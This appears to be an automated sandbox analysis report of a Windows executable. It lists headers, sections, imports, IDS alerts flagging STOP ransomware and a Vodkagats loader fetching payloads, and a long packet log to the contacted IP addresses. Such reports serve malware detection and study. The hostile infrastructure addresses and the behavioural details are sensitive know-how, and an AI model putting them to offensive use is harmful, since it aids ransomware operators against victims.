xor eax, ebp
mov dword ptr [ebp-04h], eax
push ebx
push edi
lea eax, dword ptr [ebp-00000518h]
push eax
push dword ptr [esi+04h]
call dword ptr [00401170h]
mov edi, 00000100h

Rich Headers

Programming Language:

[ASM] VS2008 build 21022
[ C ] VS2008 build 21022
[IMP] VS2005 build 50727
[C++] VS2008 build 21022
[RES] VS2008 build 21022
[LNK] VS2008 build 21022

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x10a9c	0x50	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xd8000	0x3050	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x1280	0x1c	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x2cd8	0x40	.text
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x1000	0x23c	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x107d4	0x10800	False	0.5117039535984849	data	6.09735691865179	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data	0x12000	0xc5c68	0x92400	False	0.9938334668803419	data	7.994721199860208	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xd8000	0x3050	0x3200	False	0.629140625	data	5.666597605339273	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
JEBOPOZUSUHARAFA	0xda430	0x55f	ASCII text, with very long lines (1375), with no line terminators	Raeto-Romance	Switzerland
RT_ICON	0xd82b0	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	Raeto-Romance	Switzerland
RT_ICON	0xd8978	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	Raeto-Romance	Switzerland
RT_ICON	0xd8ee0	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	Raeto-Romance	Switzerland
RT_ICON	0xd9f88	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Raeto-Romance	Switzerland
RT_STRING	0xdab78	0x2d8	data	Raeto-Romance	Switzerland
RT_STRING	0xdae50	0x1fc	data	Raeto-Romance	Switzerland
RT_ACCELERATOR	0xda990	0xa0	data	Raeto-Romance	Switzerland
RT_GROUP_ICON	0xda3f0	0x3e	data	Raeto-Romance	Switzerland
RT_VERSION	0xdaa30	0x148	x86 executable not stripped

Imports

DLL	Import
KERNEL32.dll	OpenMutexW, GetConsoleAliasExesLengthA, CopyFileExA, ReadConsoleOutputCharacterW, CompareStringW, SetVolumeLabelA, FillConsoleOutputAttribute, GetConsoleTitleA, QueryDosDeviceW, EnumCalendarInfoExA, GetProcessPriorityBoost, IsProcessInJob, AddConsoleAliasW, CreateFileW, SetMailslotInfo, GetWindowsDirectoryW, GetModuleHandleA, GlobalLock, CreateDirectoryExW, GetLogicalDriveStringsA, ReadConsoleInputA, FindNextVolumeMountPointW, OpenWaitableTimerA, GetVersionExA, SearchPathA, MoveFileExW, CallNamedPipeW, GetCurrentDirectoryW, GetDriveTypeA, CreateMailslotA, BuildCommDCBAndTimeoutsA, GetProcAddress, LoadLibraryA, LocalAlloc, GetBinaryTypeA, GetCPInfoExW, WriteConsoleOutputA, GetCommandLineA, EnumDateFormatsW, CancelTimerQueueTimer, GetHandleInformation, FindResourceA, CreateJobObjectA, FindFirstVolumeA, GlobalFlags, CreateNamedPipeW, InterlockedIncrement, CloseHandle, CopyFileW, GetComputerNameExA, GetShortPathNameA, FlushFileBuffers, GetLogicalDriveStringsW, InterlockedCompareExchange, EnumCalendarInfoW, GetConsoleAliasExesLengthW, InterlockedExchange, GetNamedPipeHandleStateW, GetModuleHandleW, GetCurrentActCtx, GenerateConsoleCtrlEvent, MoveFileW, AddAtomA, SetThreadPriority, FreeEnvironmentStringsW, SetConsoleTitleW, SetVolumeMountPointW, VirtualAlloc, _hread, EnumResourceLanguagesW, ClearCommBreak, QueryMemoryResourceNotification, GlobalFindAtomA, HeapWalk, SetFilePointer, GetTickCount, EnumSystemCodePagesW, VerifyVersionInfoA, LoadLibraryW, CreateFileA, GetLastError, WideCharToMultiByte, HeapReAlloc, HeapAlloc, HeapFree, UnhandledExceptionFilter, SetUnhandledExceptionFilter, DeleteFileA, GetStartupInfoA, GetCPInfo, InterlockedDecrement, GetACP, GetOEMCP, IsValidCodePage, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, SetLastError, GetCurrentThreadId, TerminateProcess, GetCurrentProcess, IsDebuggerPresent, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, HeapCreate, VirtualFree, Sleep, ExitProcess, WriteFile, GetStdHandle, GetModuleFileNameA, FreeEnvironmentStringsA, GetEnvironmentStrings, GetEnvironmentStringsW, SetHandleCount, GetFileType, QueryPerformanceCounter, GetCurrentProcessId, GetSystemTimeAsFileTime, LCMapStringA, MultiByteToWideChar, LCMapStringW, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, SetStdHandle, GetConsoleCP, GetConsoleMode, RtlUnwind, InitializeCriticalSectionAndSpinCount, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, HeapSize, ReadFile
GDI32.dll	GetCharWidthA, GetCharABCWidthsA
WINHTTP.dll	WinHttpSetOption

Possible Origin

Language of compilation system	Country where language is spoken	Map
Raeto-Romance	Switzerland

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
222.236.49.123192.168.2.580497042036335 11/30/22-00:22:18.131398	TCP	2036335	ET TROJAN Win32/Filecoder.STOP Variant Public Key Download	80	49704	222.236.49.123	192.168.2.5
192.168.2.5222.236.49.12349706802036333 11/30/22-00:22:26.085731	TCP	2036333	ET TROJAN Win32/Vodkagats Loader Requesting Payload	49706	80	192.168.2.5	222.236.49.123
192.168.2.58.8.8.851441532023883 11/30/22-00:22:16.657289	UDP	2023883	ET DNS Query to a *.top domain - Likely Hostile	51441	53	192.168.2.5	8.8.8.8
192.168.2.5222.236.49.12349706802020826 11/30/22-00:22:26.085731	TCP	2020826	ET TROJAN Potential Dridex.Maldoc Minimal Executable Request	49706	80	192.168.2.5	222.236.49.123
192.168.2.5116.121.62.23749705802020826 11/30/22-00:22:17.137850	TCP	2020826	ET TROJAN Potential Dridex.Maldoc Minimal Executable Request	49705	80	192.168.2.5	116.121.62.237
192.168.2.5116.121.62.23749705802036333 11/30/22-00:22:17.137850	TCP	2036333	ET TROJAN Win32/Vodkagats Loader Requesting Payload	49705	80	192.168.2.5	116.121.62.237

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 30, 2022 00:22:09.435889959 CET	49702	443	192.168.2.5	162.0.217.254
Nov 30, 2022 00:22:09.435945988 CET	443	49702	162.0.217.254	192.168.2.5
Nov 30, 2022 00:22:09.436464071 CET	49702	443	192.168.2.5	162.0.217.254
Nov 30, 2022 00:22:09.469263077 CET	49702	443	192.168.2.5	162.0.217.254
Nov 30, 2022 00:22:09.469322920 CET	443	49702	162.0.217.254	192.168.2.5
Nov 30, 2022 00:22:09.546952009 CET	443	49702	162.0.217.254	192.168.2.5
Nov 30, 2022 00:22:09.547126055 CET	49702	443	192.168.2.5	162.0.217.254
Nov 30, 2022 00:22:09.898497105 CET	49702	443	192.168.2.5	162.0.217.254
Nov 30, 2022 00:22:09.898566008 CET	443	49702	162.0.217.254	192.168.2.5
Nov 30, 2022 00:22:09.899504900 CET	443	49702	162.0.217.254	192.168.2.5
Nov 30, 2022 00:22:09.899597883 CET	49702	443	192.168.2.5	162.0.217.254
Nov 30, 2022 00:22:09.902540922 CET	49702	443	192.168.2.5	162.0.217.254
Nov 30, 2022 00:22:09.902566910 CET	443	49702	162.0.217.254	192.168.2.5
Nov 30, 2022 00:22:09.943552017 CET	443	49702	162.0.217.254	192.168.2.5
Nov 30, 2022 00:22:09.943653107 CET	443	49702	162.0.217.254	192.168.2.5
Nov 30, 2022 00:22:09.943658113 CET	49702	443	192.168.2.5	162.0.217.254
Nov 30, 2022 00:22:09.943805933 CET	49702	443	192.168.2.5	162.0.217.254
Nov 30, 2022 00:22:10.054886103 CET	49702	443	192.168.2.5	162.0.217.254
Nov 30, 2022 00:22:10.054929018 CET	443	49702	162.0.217.254	192.168.2.5
Nov 30, 2022 00:22:16.200620890 CET	49703	443	192.168.2.5	162.0.217.254
Nov 30, 2022 00:22:16.200680017 CET	443	49703	162.0.217.254	192.168.2.5
Nov 30, 2022 00:22:16.200789928 CET	49703	443	192.168.2.5	162.0.217.254
Nov 30, 2022 00:22:16.245260000 CET	49703	443	192.168.2.5	162.0.217.254
Nov 30, 2022 00:22:16.245289087 CET	443	49703	162.0.217.254	192.168.2.5
Nov 30, 2022 00:22:16.312412024 CET	443	49703	162.0.217.254	192.168.2.5
Nov 30, 2022 00:22:16.312542915 CET	49703	443	192.168.2.5	162.0.217.254
Nov 30, 2022 00:22:16.346792936 CET	49703	443	192.168.2.5	162.0.217.254
Nov 30, 2022 00:22:16.346860886 CET	443	49703	162.0.217.254	192.168.2.5
Nov 30, 2022 00:22:16.347371101 CET	443	49703	162.0.217.254	192.168.2.5
Nov 30, 2022 00:22:16.347579002 CET	49703	443	192.168.2.5	162.0.217.254
Nov 30, 2022 00:22:16.350308895 CET	49703	443	192.168.2.5	162.0.217.254
Nov 30, 2022 00:22:16.350330114 CET	443	49703	162.0.217.254	192.168.2.5
Nov 30, 2022 00:22:16.396068096 CET	443	49703	162.0.217.254	192.168.2.5
Nov 30, 2022 00:22:16.396161079 CET	443	49703	162.0.217.254	192.168.2.5
Nov 30, 2022 00:22:16.396238089 CET	49703	443	192.168.2.5	162.0.217.254
Nov 30, 2022 00:22:16.455621004 CET	49703	443	192.168.2.5	162.0.217.254
Nov 30, 2022 00:22:16.455662966 CET	443	49703	162.0.217.254	192.168.2.5
Nov 30, 2022 00:22:16.704987049 CET	49704	80	192.168.2.5	222.236.49.123
Nov 30, 2022 00:22:16.841957092 CET	49705	80	192.168.2.5	116.121.62.237
Nov 30, 2022 00:22:16.997359991 CET	80	49704	222.236.49.123	192.168.2.5
Nov 30, 2022 00:22:16.997529984 CET	49704	80	192.168.2.5	222.236.49.123
Nov 30, 2022 00:22:17.013473988 CET	49704	80	192.168.2.5	222.236.49.123
Nov 30, 2022 00:22:17.136807919 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:17.137012005 CET	49705	80	192.168.2.5	116.121.62.237
Nov 30, 2022 00:22:17.137850046 CET	49705	80	192.168.2.5	116.121.62.237
Nov 30, 2022 00:22:17.506212950 CET	80	49704	222.236.49.123	192.168.2.5
Nov 30, 2022 00:22:17.635873079 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:18.131397963 CET	80	49704	222.236.49.123	192.168.2.5
Nov 30, 2022 00:22:18.131433964 CET	80	49704	222.236.49.123	192.168.2.5
Nov 30, 2022 00:22:18.131561995 CET	49704	80	192.168.2.5	222.236.49.123
Nov 30, 2022 00:22:18.131875038 CET	49704	80	192.168.2.5	222.236.49.123
Nov 30, 2022 00:22:18.425659895 CET	80	49704	222.236.49.123	192.168.2.5
Nov 30, 2022 00:22:18.428991079 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:18.429039001 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:18.429260015 CET	49705	80	192.168.2.5	116.121.62.237
Nov 30, 2022 00:22:18.725884914 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:18.725986004 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:18.726016998 CET	49705	80	192.168.2.5	116.121.62.237
Nov 30, 2022 00:22:18.726057053 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:18.726106882 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:18.726135015 CET	49705	80	192.168.2.5	116.121.62.237
Nov 30, 2022 00:22:18.726202011 CET	49705	80	192.168.2.5	116.121.62.237
Nov 30, 2022 00:22:18.726202011 CET	49705	80	192.168.2.5	116.121.62.237
Nov 30, 2022 00:22:19.020948887 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:19.021039009 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:19.021250963 CET	49705	80	192.168.2.5	116.121.62.237
Nov 30, 2022 00:22:19.021750927 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:19.021878004 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:19.021920919 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:19.021985054 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:19.021986008 CET	49705	80	192.168.2.5	116.121.62.237
Nov 30, 2022 00:22:19.022032976 CET	49705	80	192.168.2.5	116.121.62.237
Nov 30, 2022 00:22:19.022056103 CET	49705	80	192.168.2.5	116.121.62.237
Nov 30, 2022 00:22:19.022083998 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:19.022130966 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:19.022201061 CET	49705	80	192.168.2.5	116.121.62.237
Nov 30, 2022 00:22:19.316337109 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:19.316379070 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:19.316396952 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:19.316416025 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:19.316667080 CET	49705	80	192.168.2.5	116.121.62.237
Nov 30, 2022 00:22:19.316667080 CET	49705	80	192.168.2.5	116.121.62.237
Nov 30, 2022 00:22:19.316993952 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:19.317049980 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:19.317094088 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:19.317120075 CET	49705	80	192.168.2.5	116.121.62.237
Nov 30, 2022 00:22:19.317167997 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:19.317214966 CET	49705	80	192.168.2.5	116.121.62.237
Nov 30, 2022 00:22:19.317276001 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:19.317364931 CET	49705	80	192.168.2.5	116.121.62.237
Nov 30, 2022 00:22:19.317444086 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:19.317487955 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:19.317508936 CET	49705	80	192.168.2.5	116.121.62.237
Nov 30, 2022 00:22:19.317549944 CET	49705	80	192.168.2.5	116.121.62.237
Nov 30, 2022 00:22:19.317610025 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:19.317665100 CET	49705	80	192.168.2.5	116.121.62.237
Nov 30, 2022 00:22:19.317768097 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:19.317805052 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:19.317894936 CET	49705	80	192.168.2.5	116.121.62.237
Nov 30, 2022 00:22:19.612457991 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:19.612519979 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:19.612551928 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:19.612641096 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:19.612720013 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:19.612797022 CET	49705	80	192.168.2.5	116.121.62.237
Nov 30, 2022 00:22:19.612797022 CET	49705	80	192.168.2.5	116.121.62.237
Nov 30, 2022 00:22:19.612797022 CET	49705	80	192.168.2.5	116.121.62.237
Nov 30, 2022 00:22:19.612890959 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:19.612999916 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:19.613025904 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:19.613069057 CET	49705	80	192.168.2.5	116.121.62.237
Nov 30, 2022 00:22:19.613130093 CET	49705	80	192.168.2.5	116.121.62.237
Nov 30, 2022 00:22:19.613267899 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:19.613328934 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:19.613390923 CET	49705	80	192.168.2.5	116.121.62.237
Nov 30, 2022 00:22:19.613483906 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:19.613528967 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:19.613570929 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:19.613595009 CET	49705	80	192.168.2.5	116.121.62.237
Nov 30, 2022 00:22:19.613621950 CET	49705	80	192.168.2.5	116.121.62.237
Nov 30, 2022 00:22:19.613728046 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:19.613919020 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:19.613971949 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:19.613991022 CET	49705	80	192.168.2.5	116.121.62.237
Nov 30, 2022 00:22:19.614029884 CET	49705	80	192.168.2.5	116.121.62.237
Nov 30, 2022 00:22:19.614088058 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:19.614202976 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:19.614275932 CET	49705	80	192.168.2.5	116.121.62.237
Nov 30, 2022 00:22:19.614306927 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:19.614352942 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:19.614417076 CET	49705	80	192.168.2.5	116.121.62.237
Nov 30, 2022 00:22:19.614547014 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:19.614628077 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:19.614674091 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:19.614698887 CET	49705	80	192.168.2.5	116.121.62.237
Nov 30, 2022 00:22:19.614897966 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:19.614973068 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:19.614990950 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:19.615016937 CET	49705	80	192.168.2.5	116.121.62.237
Nov 30, 2022 00:22:19.615052938 CET	49705	80	192.168.2.5	116.121.62.237
Nov 30, 2022 00:22:19.615113020 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:19.615159988 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:19.615219116 CET	49705	80	192.168.2.5	116.121.62.237
Nov 30, 2022 00:22:19.615297079 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:19.615365982 CET	49705	80	192.168.2.5	116.121.62.237
Nov 30, 2022 00:22:19.907617092 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:19.907731056 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:19.907776117 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:19.907819986 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:19.907862902 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:19.907946110 CET	49705	80	192.168.2.5	116.121.62.237
Nov 30, 2022 00:22:19.907991886 CET	49705	80	192.168.2.5	116.121.62.237
Nov 30, 2022 00:22:19.908046007 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:19.908092022 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:19.908140898 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:19.908154011 CET	49705	80	192.168.2.5	116.121.62.237
Nov 30, 2022 00:22:19.908281088 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:19.908337116 CET	49705	80	192.168.2.5	116.121.62.237
Nov 30, 2022 00:22:19.908382893 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:19.908427954 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:19.908448935 CET	49705	80	192.168.2.5	116.121.62.237
Nov 30, 2022 00:22:19.908477068 CET	49705	80	192.168.2.5	116.121.62.237
Nov 30, 2022 00:22:19.908550024 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:19.908606052 CET	49705	80	192.168.2.5	116.121.62.237
Nov 30, 2022 00:22:19.908766031 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:19.908818960 CET	49705	80	192.168.2.5	116.121.62.237
Nov 30, 2022 00:22:19.908859968 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:19.908905029 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:19.908958912 CET	49705	80	192.168.2.5	116.121.62.237
Nov 30, 2022 00:22:19.909003973 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:19.909079075 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:19.909152031 CET	49705	80	192.168.2.5	116.121.62.237
Nov 30, 2022 00:22:19.909254074 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:19.909313917 CET	49705	80	192.168.2.5	116.121.62.237
Nov 30, 2022 00:22:19.909339905 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:19.909445047 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:19.909512997 CET	49705	80	192.168.2.5	116.121.62.237
Nov 30, 2022 00:22:19.909615040 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:19.909687996 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:19.909749985 CET	49705	80	192.168.2.5	116.121.62.237
Nov 30, 2022 00:22:19.909786940 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:19.909991980 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:19.910034895 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:19.910057068 CET	49705	80	192.168.2.5	116.121.62.237
Nov 30, 2022 00:22:19.910165071 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:19.910208941 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:19.910229921 CET	49705	80	192.168.2.5	116.121.62.237
Nov 30, 2022 00:22:19.910255909 CET	49705	80	192.168.2.5	116.121.62.237
Nov 30, 2022 00:22:19.910330057 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:19.910461903 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:19.910501003 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:19.910578012 CET	49705	80	192.168.2.5	116.121.62.237
Nov 30, 2022 00:22:19.910706997 CET	49705	80	192.168.2.5	116.121.62.237
Nov 30, 2022 00:22:20.223701954 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:20.223742962 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:20.223757982 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:20.223836899 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:20.223881006 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:20.223997116 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:20.224117994 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:20.224260092 CET	49705	80	192.168.2.5	116.121.62.237
Nov 30, 2022 00:22:20.224282026 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:20.224298000 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:20.224359035 CET	49705	80	192.168.2.5	116.121.62.237
Nov 30, 2022 00:22:20.224441051 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:20.224562883 CET	49705	80	192.168.2.5	116.121.62.237
Nov 30, 2022 00:22:20.224601030 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:20.224679947 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:20.224800110 CET	49705	80	192.168.2.5	116.121.62.237
Nov 30, 2022 00:22:20.224848032 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:20.224925995 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:20.224947929 CET	49705	80	192.168.2.5	116.121.62.237
Nov 30, 2022 00:22:20.224970102 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:20.225074053 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:20.225159883 CET	49705	80	192.168.2.5	116.121.62.237
Nov 30, 2022 00:22:20.225339890 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:20.225368023 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:20.225503922 CET	49705	80	192.168.2.5	116.121.62.237
Nov 30, 2022 00:22:20.225735903 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:20.225765944 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:20.225784063 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:20.225800991 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:20.225847960 CET	49705	80	192.168.2.5	116.121.62.237
Nov 30, 2022 00:22:20.225883961 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:20.226027966 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:20.226074934 CET	49705	80	192.168.2.5	116.121.62.237
Nov 30, 2022 00:22:20.226106882 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:20.226212025 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:20.226342916 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:20.226358891 CET	49705	80	192.168.2.5	116.121.62.237
Nov 30, 2022 00:22:20.226483107 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:20.226507902 CET	49705	80	192.168.2.5	116.121.62.237
Nov 30, 2022 00:22:20.226591110 CET	49705	80	192.168.2.5	116.121.62.237
Nov 30, 2022 00:22:20.226622105 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:20.226684093 CET	49705	80	192.168.2.5	116.121.62.237
Nov 30, 2022 00:22:20.226737022 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:20.226762056 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:20.226785898 CET	49705	80	192.168.2.5	116.121.62.237
Nov 30, 2022 00:22:20.226910114 CET	49705	80	192.168.2.5	116.121.62.237
Nov 30, 2022 00:22:20.226980925 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:20.227060080 CET	49705	80	192.168.2.5	116.121.62.237
Nov 30, 2022 00:22:20.529290915 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:20.529369116 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:20.529427052 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:20.529475927 CET	49705	80	192.168.2.5	116.121.62.237
Nov 30, 2022 00:22:20.529475927 CET	49705	80	192.168.2.5	116.121.62.237
Nov 30, 2022 00:22:20.529536963 CET	49705	80	192.168.2.5	116.121.62.237
Nov 30, 2022 00:22:20.529613972 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:20.529668093 CET	49705	80	192.168.2.5	116.121.62.237
Nov 30, 2022 00:22:20.529714108 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:20.529776096 CET	49705	80	192.168.2.5	116.121.62.237
Nov 30, 2022 00:22:20.529814005 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:20.529874086 CET	49705	80	192.168.2.5	116.121.62.237
Nov 30, 2022 00:22:20.529901981 CET	80	49705	116.121.62.237	192.168.2.5
